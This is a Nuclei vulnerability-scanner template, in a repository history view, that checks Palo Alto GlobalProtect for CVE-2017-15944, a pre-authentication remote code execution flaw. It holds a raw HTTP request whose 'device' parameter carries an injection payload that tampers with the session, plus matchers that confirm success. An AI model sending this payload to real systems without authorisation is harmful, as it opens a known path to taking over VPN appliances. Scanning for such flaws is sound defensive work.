nuclei-templates/cves/2017/CVE-2017-15944.yaml

28 lines
694 B
YAML
Raw Normal View History

id: CVE-2017-15944
info:
name: PreAuth RCE on Palo Alto GlobalProtect
2021-07-17 11:37:28 +00:00
author: emadshanab,milo2012
reference:
2021-07-17 11:37:28 +00:00
- https://www.exploit-db.com/exploits/43342
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
severity: high
2021-07-17 11:37:28 +00:00
tags: cve,cve2017,rce,vpn,paloalto,globalprotect
requests:
2021-07-17 11:37:28 +00:00
- raw:
- |
GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{randstr}};
matchers-condition: and
matchers:
- type: word
words:
2021-07-17 11:37:28 +00:00
- "@start@Success@end@"
part: body
- type: status
status:
2021-07-17 11:37:28 +00:00
- 200